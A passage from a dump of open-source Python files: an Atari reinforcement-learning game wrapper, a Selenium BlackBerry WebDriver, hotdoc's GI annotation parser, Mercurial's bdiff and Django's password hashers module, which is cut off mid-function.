self.resized_rows = resized_rows
self.resized_cols = resized_cols
self.crop_offset = crop_offset
self.frame_skip = frame_skip
self.history_length = history_length
self.max_null_op = max_null_op
self.death_end_episode = death_end_episode
self.screen_buffer_length = 2
self.screen_buffer = numpy.empty((self.screen_buffer_length,
self.ale.getScreenDims()[1], self.ale.getScreenDims()[0]),
dtype='uint8')
self.replay_memory = ReplayMemory(state_dim=(resized_rows, resized_cols),
history_length=history_length,
memory_size=replay_memory_size,
replay_start_size=replay_start_size)
self.start()
def start(self):
self.ale.reset_game()
null_op_num = self.rng.randint(self.screen_buffer_length,
max(self.max_null_op + 1, self.screen_buffer_length + 1))
for i in range(null_op_num):
self.ale.act(0)
self.ale.getScreenGrayscale(self.screen_buffer[i % self.screen_buffer_length, :, :])
self.total_reward = 0
self.episode_reward = 0
self.episode_step = 0
self.max_episode_step = DEFAULT_MAX_EPISODE_STEP
self.start_lives = self.ale.lives()
def force_restart(self):
self.start()
self.replay_memory.clear()
def begin_episode(self, max_episode_step=DEFAULT_MAX_EPISODE_STEP):
"""
        Begin an episode of a game instance. We can play the game for at most
        `max_episode_step` steps; after that, we are forced to restart.
"""
if self.episode_step > self.max_episode_step or self.ale.game_over():
self.start()
else:
for i in range(self.screen_buffer_length):
self.ale.act(0)
self.ale.getScreenGrayscale(self.screen_buffer[i % self.screen_buffer_length, :, :])
self.max_episode_step = max_episode_step
self.start_lives = self.ale.lives()
self.episode_reward = 0
self.episode_step = 0
@property
def episode_terminate(self):
termination_flag = self.ale.game_over() or self.episode_step >= self.max_episode_step
if self.death_end_episode:
return (self.ale.lives() < self.start_lives) or termination_flag
else:
return termination_flag
@property
def state_enabled(self):
return self.replay_memory.size >= self.replay_memory.history_length
def get_observation(self):
image = self.screen_buffer.max(axis=0)
if 'crop' == self.resize_mode:
original_rows, original_cols = image.shape
new_resized_rows = int(round(
float(original_rows) * self.resized_cols / original_cols))
resized = cv2.resize(image, (self.resized_cols, new_resized_rows),
interpolation=cv2.INTER_LINEAR)
crop_y_cutoff = new_resized_rows - self.crop_offset - self.resized_rows
img = resized[crop_y_cutoff:
crop_y_cutoff + self.resized_rows, :]
return img
else:
return cv2.resize(image, (self.resized_cols, self.resized_rows),
interpolation=cv2.INTER_LINEAR)
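    # Worked example (assuming the standard 160x210 Atari screen and the
    # defaults above): 'crop' first scales to 84x110, then keeps rows
    # 18..101, since 110 - 8 - 84 = 18.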
def play(self, a):
assert not self.episode_terminate,\
"Warning, the episode seems to have terminated. " \
"We need to call either game.begin_episode(max_episode_step) to continue a new " \
"episode or game.start() to force restart."
self.episode_step += 1
reward = 0.0
action = self.action_set[a]
for i in range(self.frame_skip):
reward += self.ale.act(action)
self.ale.getScreenGrayscale(self.screen_buffer[i % self.screen_buffer_length, :, :])
self.total_reward += reward
self.episode_reward += reward
ob = self.get_observation()
terminate_flag = self.episode_terminate
self.replay_memory.append(ob, a, numpy.clip(reward, -1, 1), terminate_flag)
return reward, terminate_flag
| apache-2.0 |
LukeMurphey/splunk-network-tools | tests/selenium/webdriver/blackberry/webdriver.py | 44 | 4870 | # Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import platform
import subprocess
try:
import http.client as http_client
except ImportError:
import httplib as http_client
from selenium.webdriver.remote.webdriver import WebDriver as RemoteWebDriver
from selenium.common.exceptions import WebDriverException
from selenium.webdriver.support.ui import WebDriverWait
LOAD_TIMEOUT = 5
class WebDriver(RemoteWebDriver):
"""
Controls the BlackBerry Browser and allows you to drive it.
:Args:
- device_password - password for the BlackBerry device or emulator you are
trying to drive
- bb_tools_dir path to the blackberry-deploy executable. If the default
is used it assumes it is in the $PATH
- hostip - the ip for the device you are trying to drive. Falls back to
169.254.0.1 which is the default ip used
- port - the port being used for WebDriver on device. defaults to 1338
- desired_capabilities: Dictionary object with non-browser specific
capabilities only, such as "proxy" or "loggingPref".
Note: To get blackberry-deploy you will need to install the BlackBerry
WebWorks SDK - the default install will put it in the $PATH for you.
Download at https://developer.blackberry.com/html5/downloads/
"""
def __init__(self, device_password, bb_tools_dir=None,
hostip='169.254.0.1', port=1338, desired_capabilities={}):
remote_addr = 'http://{}:{}'.format(hostip, port)
filename = 'blackberry-deploy'
if platform.system() == "Windows":
filename += '.bat'
if bb_tools_dir is not None:
if os.path.isdir(bb_tools_dir):
bb_deploy_location = os.path.join(bb_tools_dir, filename)
if not os.path.isfile(bb_deploy_location):
raise WebDriverException('Invalid blackberry-deploy location: {}'.format(bb_deploy_location))
else:
raise WebDriverException('Invalid blackberry tools location, must be a directory: {}'.format(bb_tools_dir))
else:
bb_deploy_location = filename
"""
Now launch the BlackBerry browser before allowing anything else to run.
"""
try:
launch_args = [bb_deploy_location,
'-launchApp',
str(hostip),
'-package-name', 'sys.browser',
'-package-id', 'gYABgJYFHAzbeFMPCCpYWBtHAm0',
'-password', str(device_password)]
with open(os.devnull, 'w') as fp:
p = subprocess.Popen(launch_args, stdout=fp)
returncode = p.wait()
if returncode == 0:
# wait for the BlackBerry10 browser to load.
is_running_args = [bb_deploy_location,
'-isAppRunning',
str(hostip),
'-package-name', 'sys.browser',
'-package-id', 'gYABgJYFHAzbeFMPCCpYWBtHAm0',
'-password', str(device_password)]
                WebDriverWait(None, LOAD_TIMEOUT)\
                    .until(lambda x: b'result::true' in
                           subprocess.check_output(is_running_args),
                           message='waiting for BlackBerry10 browser to load')
RemoteWebDriver.__init__(self,
command_executor=remote_addr,
desired_capabilities=desired_capabilities)
else:
raise WebDriverException('blackberry-deploy failed to launch browser')
except Exception as e:
raise WebDriverException('Something went wrong launching blackberry-deploy', stacktrace=getattr(e, 'stacktrace', None))
def quit(self):
"""
        Closes the browser and shuts down the WebDriver session.
"""
try:
RemoteWebDriver.quit(self)
except http_client.BadStatusLine:
pass
| apache-2.0 |
hotdoc/hotdoc | hotdoc/extensions/gi/annotation_parser.py | 1 | 7809 | # -*- coding: utf-8 -*-
#
# Copyright © 2015,2016 Mathieu Duponchelle <[email protected]>
# Copyright © 2015,2016 Collabora Ltd
#
# This library is free software; you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# This library is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this library. If not, see <http://www.gnu.org/licenses/>.
ALLOW_NONE_HELP = \
"NULL is OK, both for passing and returning"
TRANSFER_NONE_HELP = \
"Don't free data after the code is done"
TRANSFER_FULL_HELP = \
"Free data after the code is done"
TRANSFER_FLOATING_HELP = \
"Alias for transfer none, used for objects with floating refs"
TRANSFER_CONTAINER_HELP = \
"Free data container after the code is done"
CLOSURE_HELP = \
"This parameter is a closure for callbacks, many bindings can pass NULL to %s"
CLOSURE_DATA_HELP = \
"This parameter is a closure for callbacks, many bindings can pass NULL here"
DIRECTION_OUT_HELP = \
"Parameter for returning results"
DIRECTION_INOUT_HELP = \
"Parameter for input and for returning results"
DIRECTION_IN_HELP = \
"Parameter for input. Default is transfer none"
ARRAY_HELP = \
"Parameter points to an array of items"
ELEMENT_TYPE_HELP = \
"Generic and defining element of containers and arrays"
SCOPE_ASYNC_HELP = \
"The callback is valid until first called"
SCOPE_CALL_HELP = \
"The callback is valid only during the call to the method"
SCOPE_NOTIFIED_HELP = \
"The callback is valid until the GDestroyNotify argument is called"
NULLABLE_HELP = \
"NULL may be passed to the value"
NOT_NULLABLE_HELP = \
"NULL is *not* OK, either for passing or returning"
DEFAULT_HELP = \
"Default parameter value (for in case the shadows-to function has less parameters)"
DESTROY_HELP = \
"The parameter is a 'destroy_data' for callbacks."
# VERY DIFFERENT FROM THE PREVIOUS ONE BEWARE :P
OPTIONAL_HELP = \
"NULL may be passed instead of a pointer to a location"
# WTF
TYPE_HELP = \
"Override the parsed C type with given type"
class GIAnnotation (object):
def __init__(self, nick, help_text, value=None):
self.nick = nick
self.help_text = help_text
self.value = value
class GIAnnotationParser(object):
def __init__(self):
self.__annotation_factories = \
{"allow-none": self.__make_allow_none_annotation,
"transfer": self.__make_transfer_annotation,
"inout": self.__make_inout_annotation,
"out": self.__make_out_annotation,
"in": self.__make_in_annotation,
"array": self.__make_array_annotation,
"element-type": self.__make_element_type_annotation,
"scope": self.__make_scope_annotation,
"closure": self.__make_closure_annotation,
"nullable": self.__make_nullable_annotation,
"type": self.__make_type_annotation,
"optional": self.__make_optional_annotation,
"default": self.__make_default_annotation,
"destroy": self.__make_destroy_annotation,
}
def __make_type_annotation (self, annotation, value):
if not value:
return None
return GIAnnotation("type", TYPE_HELP, value[0])
def __make_nullable_annotation (self, annotation, value):
return GIAnnotation("nullable", NULLABLE_HELP)
def __make_optional_annotation (self, annotation, value):
return GIAnnotation ("optional", OPTIONAL_HELP)
def __make_allow_none_annotation(self, annotation, value):
return GIAnnotation ("allow-none", ALLOW_NONE_HELP)
def __make_transfer_annotation(self, annotation, value):
if value[0] == "none":
return GIAnnotation ("transfer: none", TRANSFER_NONE_HELP)
elif value[0] == "full":
return GIAnnotation ("transfer: full", TRANSFER_FULL_HELP)
elif value[0] == "floating":
return GIAnnotation ("transfer: floating", TRANSFER_FLOATING_HELP)
elif value[0] == "container":
return GIAnnotation ("transfer: container", TRANSFER_CONTAINER_HELP)
else:
return None
def __make_inout_annotation (self, annotation, value):
return GIAnnotation ("inout", DIRECTION_INOUT_HELP)
def __make_out_annotation (self, annotation, value):
return GIAnnotation ("out", DIRECTION_OUT_HELP)
def __make_in_annotation (self, annotation, value):
return GIAnnotation ("in", DIRECTION_IN_HELP)
def __make_element_type_annotation (self, annotation, value):
annotation_val = None
if type(value) == list:
annotation_val = value[0]
return GIAnnotation ("element-type", ELEMENT_TYPE_HELP, annotation_val)
def __make_array_annotation (self, annotation, value):
annotation_val = None
if type(value) == dict:
annotation_val = ""
for name, val in value.items():
annotation_val += "%s=%s" % (name, val)
return GIAnnotation ("array", ARRAY_HELP, annotation_val)
def __make_scope_annotation (self, annotation, value):
if type (value) != list or not value:
return None
if value[0] == "async":
return GIAnnotation ("scope async", SCOPE_ASYNC_HELP)
elif value[0] == "call":
return GIAnnotation ("scope call", SCOPE_CALL_HELP)
elif value[0] == 'notified':
return GIAnnotation ("scope notified", SCOPE_NOTIFIED_HELP)
return None
def __make_closure_annotation (self, annotation, value):
if type (value) != list or not value:
return GIAnnotation ("closure", CLOSURE_DATA_HELP)
return GIAnnotation ("closure", CLOSURE_HELP % value[0])
def __make_default_annotation (self, annotation, value):
return GIAnnotation ("default %s" % str (value[0]), DEFAULT_HELP)
def __make_destroy_annotation (self, annotation, value):
if value:
return GIAnnotation ("destroy %s" % str (value[0]), DESTROY_HELP)
else:
return GIAnnotation ("destroy", DESTROY_HELP)
def __make_not_nullable_annotation(self):
return GIAnnotation("not nullable", NOT_NULLABLE_HELP)
def __create_annotation (self, annotation_name, annotation_value):
factory = self.__annotation_factories.get(annotation_name)
if not factory:
return None
return factory (annotation_name, annotation_value)
def make_annotations (self, parameter):
if not parameter.comment:
return []
if not parameter.comment.annotations:
return []
annotations = []
for ann, val in parameter.comment.annotations.items():
if ann == "skip":
continue
annotation = self.__create_annotation (ann, val.argument)
if not annotation:
# Special case for silly specification
if (ann == 'not' and len(val.argument) == 1 and
val.argument[0] == 'nullable'):
annotations.append(self.__make_not_nullable_annotation())
else:
print("This parameter annotation is unknown :[" + ann + "]", val.argument)
continue
annotations.append (annotation)
return annotations
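# Typical driving code (sketch; `parameter` stands in for hotdoc's real
# comment-carrying parameter object):
#
#   parser = GIAnnotationParser()
#   for ann in parser.make_annotations(parameter):
#       print(ann.nick, '-', ann.help_text)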
| lgpl-2.1 |
MER-GROUP/intellij-community | plugins/hg4idea/testData/bin/mercurial/bdiff.py | 96 | 2318 | # bdiff.py - Python implementation of bdiff.c
#
# Copyright 2009 Matt Mackall <[email protected]> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
import struct, difflib, re
def splitnewlines(text):
'''like str.splitlines, but only split on newlines.'''
lines = [l + '\n' for l in text.split('\n')]
if lines:
if lines[-1] == '\n':
lines.pop()
else:
lines[-1] = lines[-1][:-1]
return lines
def _normalizeblocks(a, b, blocks):
prev = None
r = []
for curr in blocks:
if prev is None:
prev = curr
continue
shift = 0
a1, b1, l1 = prev
a1end = a1 + l1
b1end = b1 + l1
a2, b2, l2 = curr
a2end = a2 + l2
b2end = b2 + l2
if a1end == a2:
while (a1end + shift < a2end and
a[a1end + shift] == b[b1end + shift]):
shift += 1
elif b1end == b2:
while (b1end + shift < b2end and
a[a1end + shift] == b[b1end + shift]):
shift += 1
r.append((a1, b1, l1 + shift))
prev = a2 + shift, b2 + shift, l2 - shift
r.append(prev)
return r
def bdiff(a, b):
a = str(a).splitlines(True)
b = str(b).splitlines(True)
if not a:
s = "".join(b)
return s and (struct.pack(">lll", 0, 0, len(s)) + s)
bin = []
p = [0]
for i in a: p.append(p[-1] + len(i))
d = difflib.SequenceMatcher(None, a, b).get_matching_blocks()
d = _normalizeblocks(a, b, d)
la = 0
lb = 0
for am, bm, size in d:
s = "".join(b[lb:bm])
if am > la or s:
bin.append(struct.pack(">lll", p[la], p[am], len(s)) + s)
la = am + size
lb = bm + size
return "".join(bin)
def blocks(a, b):
an = splitnewlines(a)
bn = splitnewlines(b)
d = difflib.SequenceMatcher(None, an, bn).get_matching_blocks()
d = _normalizeblocks(an, bn, d)
return [(i, i + n, j, j + n) for (i, j, n) in d]
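# Illustrative behaviour (doctest-style sketch):
#
#   >>> blocks("a\nb\nc\n", "a\nx\nc\n")
#   [(0, 1, 0, 1), (2, 3, 2, 3), (3, 3, 3, 3)]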
def fixws(text, allws):
if allws:
text = re.sub('[ \t\r]+', '', text)
else:
text = re.sub('[ \t\r]+', ' ', text)
text = text.replace(' \n', '\n')
return text
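# E.g. (sketch): fixws("a \t b \n", True) returns "ab\n", while
# fixws("a \t b \n", False) collapses whitespace runs to "a b\n".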
| apache-2.0 |
nitin-cherian/Webapps | SimpleIsBetterThanComplex.com/myproject/.env/lib/python3.5/site-packages/django/contrib/auth/hashers.py | 64 | 22352 | from __future__ import unicode_literals
import base64
import binascii
import hashlib
import importlib
import warnings
from collections import OrderedDict
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.signals import setting_changed
from django.dispatch import receiver
from django.utils import lru_cache
from django.utils.crypto import (
constant_time_compare, get_random_string, pbkdf2,
)
from django.utils.encoding import force_bytes, force_str, force_text
from django.utils.module_loading import import_string
from django.utils.translation import ugettext_noop as _
UNUSABLE_PASSWORD_PREFIX = '!' # This will never be a valid encoded hash
UNUSABLE_PASSWORD_SUFFIX_LENGTH = 40 # number of random chars to add after UNUSABLE_PASSWORD_PREFIX
def is_password_usable(encoded):
if encoded is None or encoded.startswith(UNUSABLE_PASSWORD_PREFIX):
return False
try:
identify_hasher(encoded)
except ValueError:
return False
return True
def check_password(password, encoded, setter=None, preferred='default'):
"""
Returns a boolean of whether the raw password matches the three
part encoded digest.
If setter is specified, it'll be called when you need to
regenerate the password.
"""
if password is None or not is_password_usable(encoded):
return False
preferred = get_hasher(preferred)
hasher = identify_hasher(encoded)
hasher_changed = hasher.algorithm != preferred.algorithm
must_update = hasher_changed or preferred.must_update(encoded)
is_correct = hasher.verify(password, encoded)
# If the hasher didn't change (we don't protect against enumeration if it
# does) and the password should get updated, try to close the timing gap
# between the work factor of the current encoded password and the default
# work factor.
if not is_correct and not hasher_changed and must_update:
hasher.harden_runtime(password, encoded)
if setter and is_correct and must_update:
setter(password)
return is_correct
def make_password(password, salt=None, hasher='default'):
"""
Turn a plain-text password into a hash for database storage
Same as encode() but generates a new random salt.
If password is None then a concatenation of
UNUSABLE_PASSWORD_PREFIX and a random string will be returned
which disallows logins. Additional random string reduces chances
of gaining access to staff or superuser accounts.
See ticket #20079 for more info.
"""
if password is None:
return UNUSABLE_PASSWORD_PREFIX + get_random_string(UNUSABLE_PASSWORD_SUFFIX_LENGTH)
hasher = get_hasher(hasher)
if not salt:
salt = hasher.salt()
return hasher.encode(password, salt)
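# Typical round-trip (sketch; the encoded value is abbreviated and depends
# on the configured hashers):
#
#   encoded = make_password('s3cret')  # e.g. 'pbkdf2_sha256$<iterations>$...'
#   check_password('s3cret', encoded)  # True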
@lru_cache.lru_cache()
def get_hashers():
hashers = []
for hasher_path in settings.PASSWORD_HASHERS:
hasher_cls = import_string(hasher_path)
hasher = hasher_cls()
if not getattr(hasher, 'algorithm'):
raise ImproperlyConfigured("hasher doesn't specify an "
"algorithm name: %s" % hasher_path)
hashers.append(hasher)
return hashers
@lru_cache.lru_cache()
def get_hashers_by_algorithm():
return {hasher.algorithm: hasher for hasher in get_hashers()}
@receiver(setting_changed)
def reset_hashers(**kwargs):
if kwargs['setting'] == 'PASSWORD_HASHERS':
get_hashers.cache_clear()
get_hashers_by_algorithm.cache_clear()
def get_hasher(algorithm='default'):
"""
Returns an instance of a loaded password hasher.
If algorithm is 'default', the default hasher will be returned.
This function will also lazy import hashers specified in your
settings file if needed.
"""
if hasattr(algorithm, 'algorithm'):
return algorithm
elif algorithm == 'default':
return get_hashers()[0]
else:
hashers = get_hashers_by_algorithm()
try:
return hashers[algorithm]
except KeyError:
raise ValueError("Unknown password hashing algorithm '%s'. "
"Did you specify it in the PASSWORD_HASHERS "
"setting?" % algorithm)
def identify_hasher(encoded):
"""
Returns an instance of a loaded password hasher.
Identifies hasher algorithm by examining encoded hash, and calls
get_hasher() to return hasher. Raises ValueError if
algorithm cannot be identified, or if hasher is not loaded.
"""
# Ancient versions of Django created plain MD5 passwords and accepted
# MD5 passwords with an empty salt.
if ((len(encoded) == 32 and '$' not in encoded) or
(len(encoded) == 37 and encoded.startswith('md5$$'))):
algorithm = 'unsalted_md5'
# Ancient versions of Django accepted SHA1 passwords with an empty salt.
elif len(encoded) == 46 and encoded.startswith('sha1$$'):
algorithm = 'unsalted_sha1'
else:
algorithm = encoded.split('$', 1)[0]
return get_hasher(algorithm)
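# Illustrative sketch (not part of Django's source): identification keys off
# the algorithm prefix of the encoded string, e.g.
#     identify_hasher('pbkdf2_sha256$36000$seasalt$...')  -> PBKDF2PasswordHasher
#     identify_hasher('<32 hex chars, no "$">')           -> UnsaltedMD5PasswordHasher
# provided the matching hasher is listed in settings.PASSWORD_HASHERS.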
def mask_hash(hash, show=6, char="*"):
"""
    Returns the given hash, with only the first ``show`` characters shown. The
rest are masked with ``char`` for security reasons.
"""
masked = hash[:show]
masked += char * len(hash[show:])
return masked
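# Illustrative sketch: mask_hash('0123456789abcdef') -> '012345**********'
# (first six characters kept, the remaining ten masked with '*').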
class BasePasswordHasher(object):
"""
Abstract base class for password hashers
When creating your own hasher, you need to override algorithm,
verify(), encode() and safe_summary().
PasswordHasher objects are immutable.
"""
algorithm = None
library = None
def _load_library(self):
if self.library is not None:
if isinstance(self.library, (tuple, list)):
name, mod_path = self.library
else:
mod_path = self.library
try:
module = importlib.import_module(mod_path)
except ImportError as e:
raise ValueError("Couldn't load %r algorithm library: %s" %
(self.__class__.__name__, e))
return module
raise ValueError("Hasher %r doesn't specify a library attribute" %
self.__class__.__name__)
def salt(self):
"""
Generates a cryptographically secure nonce salt in ASCII
"""
return get_random_string()
def verify(self, password, encoded):
"""
Checks if the given password is correct
"""
raise NotImplementedError('subclasses of BasePasswordHasher must provide a verify() method')
def encode(self, password, salt):
"""
Creates an encoded database value
The result is normally formatted as "algorithm$salt$hash" and
must be fewer than 128 characters.
"""
raise NotImplementedError('subclasses of BasePasswordHasher must provide an encode() method')
def safe_summary(self, encoded):
"""
Returns a summary of safe values
The result is a dictionary and will be used where the password field
must be displayed to construct a safe representation of the password.
"""
raise NotImplementedError('subclasses of BasePasswordHasher must provide a safe_summary() method')
def must_update(self, encoded):
return False
def harden_runtime(self, password, encoded):
"""
Bridge the runtime gap between the work factor supplied in `encoded`
and the work factor suggested by this hasher.
Taking PBKDF2 as an example, if `encoded` contains 20000 iterations and
`self.iterations` is 30000, this method should run password through
another 10000 iterations of PBKDF2. Similar approaches should exist
for any hasher that has a work factor. If not, this method should be
defined as a no-op to silence the warning.
"""
warnings.warn('subclasses of BasePasswordHasher should provide a harden_runtime() method')
class PBKDF2PasswordHasher(BasePasswordHasher):
"""
Secure password hashing using the PBKDF2 algorithm (recommended)
Configured to use PBKDF2 + HMAC + SHA256.
The result is a 64 byte binary string. Iterations may be changed
safely but you must rename the algorithm if you change SHA256.
"""
algorithm = "pbkdf2_sha256"
iterations = 36000
digest = hashlib.sha256
def encode(self, password, salt, iterations=None):
assert password is not None
assert salt and '$' not in salt
if not iterations:
iterations = self.iterations
hash = pbkdf2(password, salt, iterations, digest=self.digest)
hash = base64.b64encode(hash).decode('ascii').strip()
return "%s$%d$%s$%s" % (self.algorithm, iterations, salt, hash)
def verify(self, password, encoded):
algorithm, iterations, salt, hash = encoded.split('$', 3)
assert algorithm == self.algorithm
encoded_2 = self.encode(password, salt, int(iterations))
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
algorithm, iterations, salt, hash = encoded.split('$', 3)
assert algorithm == self.algorithm
return OrderedDict([
(_('algorithm'), algorithm),
(_('iterations'), iterations),
(_('salt'), mask_hash(salt)),
(_('hash'), mask_hash(hash)),
])
def must_update(self, encoded):
algorithm, iterations, salt, hash = encoded.split('$', 3)
return int(iterations) != self.iterations
def harden_runtime(self, password, encoded):
algorithm, iterations, salt, hash = encoded.split('$', 3)
extra_iterations = self.iterations - int(iterations)
if extra_iterations > 0:
self.encode(password, salt, extra_iterations)
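# Worked example (illustrative, not part of Django's source): if an encoded
# PBKDF2 hash stores 20000 iterations while self.iterations is 36000,
# harden_runtime() above runs 36000 - 20000 = 16000 extra iterations, so a
# wrong password costs roughly the same time as one hashed at the current
# work factor, which narrows the timing side channel during upgrades.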
class PBKDF2SHA1PasswordHasher(PBKDF2PasswordHasher):
"""
Alternate PBKDF2 hasher which uses SHA1, the default PRF
recommended by PKCS #5. This is compatible with other
implementations of PBKDF2, such as openssl's
PKCS5_PBKDF2_HMAC_SHA1().
"""
algorithm = "pbkdf2_sha1"
digest = hashlib.sha1
class Argon2PasswordHasher(BasePasswordHasher):
"""
Secure password hashing using the argon2 algorithm.
This is the winner of the Password Hashing Competition 2013-2015
(https://password-hashing.net). It requires the argon2-cffi library which
depends on native C code and might cause portability issues.
"""
algorithm = 'argon2'
library = 'argon2'
time_cost = 2
memory_cost = 512
parallelism = 2
def encode(self, password, salt):
argon2 = self._load_library()
data = argon2.low_level.hash_secret(
force_bytes(password),
force_bytes(salt),
time_cost=self.time_cost,
memory_cost=self.memory_cost,
parallelism=self.parallelism,
hash_len=argon2.DEFAULT_HASH_LENGTH,
type=argon2.low_level.Type.I,
)
return self.algorithm + data.decode('ascii')
def verify(self, password, encoded):
argon2 = self._load_library()
algorithm, rest = encoded.split('$', 1)
assert algorithm == self.algorithm
try:
return argon2.low_level.verify_secret(
force_bytes('$' + rest),
force_bytes(password),
type=argon2.low_level.Type.I,
)
except argon2.exceptions.VerificationError:
return False
def safe_summary(self, encoded):
(algorithm, variety, version, time_cost, memory_cost, parallelism,
salt, data) = self._decode(encoded)
assert algorithm == self.algorithm
return OrderedDict([
(_('algorithm'), algorithm),
(_('variety'), variety),
(_('version'), version),
(_('memory cost'), memory_cost),
(_('time cost'), time_cost),
(_('parallelism'), parallelism),
(_('salt'), mask_hash(salt)),
(_('hash'), mask_hash(data)),
])
def must_update(self, encoded):
(algorithm, variety, version, time_cost, memory_cost, parallelism,
salt, data) = self._decode(encoded)
assert algorithm == self.algorithm
argon2 = self._load_library()
return (
argon2.low_level.ARGON2_VERSION != version or
self.time_cost != time_cost or
self.memory_cost != memory_cost or
self.parallelism != parallelism
)
def harden_runtime(self, password, encoded):
# The runtime for Argon2 is too complicated to implement a sensible
# hardening algorithm.
pass
def _decode(self, encoded):
"""
Split an encoded hash and return: (
algorithm, variety, version, time_cost, memory_cost,
parallelism, salt, data,
).
"""
bits = encoded.split('$')
if len(bits) == 5:
# Argon2 < 1.3
algorithm, variety, raw_params, salt, data = bits
version = 0x10
else:
assert len(bits) == 6
algorithm, variety, raw_version, raw_params, salt, data = bits
assert raw_version.startswith('v=')
version = int(raw_version[len('v='):])
params = dict(bit.split('=', 1) for bit in raw_params.split(','))
assert len(params) == 3 and all(x in params for x in ('t', 'm', 'p'))
time_cost = int(params['t'])
memory_cost = int(params['m'])
parallelism = int(params['p'])
return (
algorithm, variety, version, time_cost, memory_cost, parallelism,
salt, data,
)
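# Illustrative sketch (not part of Django's source): for a stored value such
# as 'argon2$argon2i$v=19$m=512,t=2,p=2$c2FsdA$aGFzaA', splitting on '$'
# yields six parts, so _decode() returns
#     ('argon2', 'argon2i', 19, 2, 512, 2, 'c2FsdA', 'aGFzaA')
# i.e. (algorithm, variety, version, time_cost, memory_cost, parallelism,
# salt, data); five-part values from argon2 < 1.3 get version 0x10.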
class BCryptSHA256PasswordHasher(BasePasswordHasher):
"""
Secure password hashing using the bcrypt algorithm (recommended)
This is considered by many to be the most secure algorithm but you
must first install the bcrypt library. Please be warned that
this library depends on native C code and might cause portability
issues.
"""
algorithm = "bcrypt_sha256"
digest = hashlib.sha256
library = ("bcrypt", "bcrypt")
rounds = 12
def salt(self):
bcrypt = self._load_library()
return bcrypt.gensalt(self.rounds)
def encode(self, password, salt):
bcrypt = self._load_library()
# Hash the password prior to using bcrypt to prevent password
# truncation as described in #20138.
if self.digest is not None:
# Use binascii.hexlify() because a hex encoded bytestring is
# Unicode on Python 3.
password = binascii.hexlify(self.digest(force_bytes(password)).digest())
else:
password = force_bytes(password)
data = bcrypt.hashpw(password, salt)
return "%s$%s" % (self.algorithm, force_text(data))
def verify(self, password, encoded):
algorithm, data = encoded.split('$', 1)
assert algorithm == self.algorithm
encoded_2 = self.encode(password, force_bytes(data))
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
algorithm, empty, algostr, work_factor, data = encoded.split('$', 4)
assert algorithm == self.algorithm
salt, checksum = data[:22], data[22:]
return OrderedDict([
(_('algorithm'), algorithm),
(_('work factor'), work_factor),
(_('salt'), mask_hash(salt)),
(_('checksum'), mask_hash(checksum)),
])
def must_update(self, encoded):
algorithm, empty, algostr, rounds, data = encoded.split('$', 4)
return int(rounds) != self.rounds
def harden_runtime(self, password, encoded):
_, data = encoded.split('$', 1)
salt = data[:29] # Length of the salt in bcrypt.
rounds = data.split('$')[2]
# work factor is logarithmic, adding one doubles the load.
diff = 2**(self.rounds - int(rounds)) - 1
while diff > 0:
self.encode(password, force_bytes(salt))
diff -= 1
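# Worked example (illustrative, not part of Django's source): bcrypt's work
# factor is logarithmic, so if the stored hash used rounds=10 while
# self.rounds is 12, each current-cost hash is 2**2 = 4 times as expensive;
# harden_runtime() above therefore re-hashes 2**(12 - 10) - 1 = 3 extra
# times to approximate the runtime of a single rounds=12 verification.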
class BCryptPasswordHasher(BCryptSHA256PasswordHasher):
"""
Secure password hashing using the bcrypt algorithm
This is considered by many to be the most secure algorithm but you
must first install the bcrypt library. Please be warned that
this library depends on native C code and might cause portability
issues.
This hasher does not first hash the password which means it is subject to
    the 72 character bcrypt password truncation; most use cases should prefer
the BCryptSHA256PasswordHasher.
See: https://code.djangoproject.com/ticket/20138
"""
algorithm = "bcrypt"
digest = None
class SHA1PasswordHasher(BasePasswordHasher):
"""
The SHA1 password hashing algorithm (not recommended)
"""
algorithm = "sha1"
def encode(self, password, salt):
assert password is not None
assert salt and '$' not in salt
hash = hashlib.sha1(force_bytes(salt + password)).hexdigest()
return "%s$%s$%s" % (self.algorithm, salt, hash)
def verify(self, password, encoded):
algorithm, salt, hash = encoded.split('$', 2)
assert algorithm == self.algorithm
encoded_2 = self.encode(password, salt)
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
algorithm, salt, hash = encoded.split('$', 2)
assert algorithm == self.algorithm
return OrderedDict([
(_('algorithm'), algorithm),
(_('salt'), mask_hash(salt, show=2)),
(_('hash'), mask_hash(hash)),
])
def harden_runtime(self, password, encoded):
pass
class MD5PasswordHasher(BasePasswordHasher):
"""
The Salted MD5 password hashing algorithm (not recommended)
"""
algorithm = "md5"
def encode(self, password, salt):
assert password is not None
assert salt and '$' not in salt
hash = hashlib.md5(force_bytes(salt + password)).hexdigest()
return "%s$%s$%s" % (self.algorithm, salt, hash)
def verify(self, password, encoded):
algorithm, salt, hash = encoded.split('$', 2)
assert algorithm == self.algorithm
encoded_2 = self.encode(password, salt)
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
algorithm, salt, hash = encoded.split('$', 2)
assert algorithm == self.algorithm
return OrderedDict([
(_('algorithm'), algorithm),
(_('salt'), mask_hash(salt, show=2)),
(_('hash'), mask_hash(hash)),
])
def harden_runtime(self, password, encoded):
pass
class UnsaltedSHA1PasswordHasher(BasePasswordHasher):
"""
Very insecure algorithm that you should *never* use; stores SHA1 hashes
with an empty salt.
This class is implemented because Django used to accept such password
hashes. Some older Django installs still have these values lingering
around so we need to handle and upgrade them properly.
"""
algorithm = "unsalted_sha1"
def salt(self):
return ''
def encode(self, password, salt):
assert salt == ''
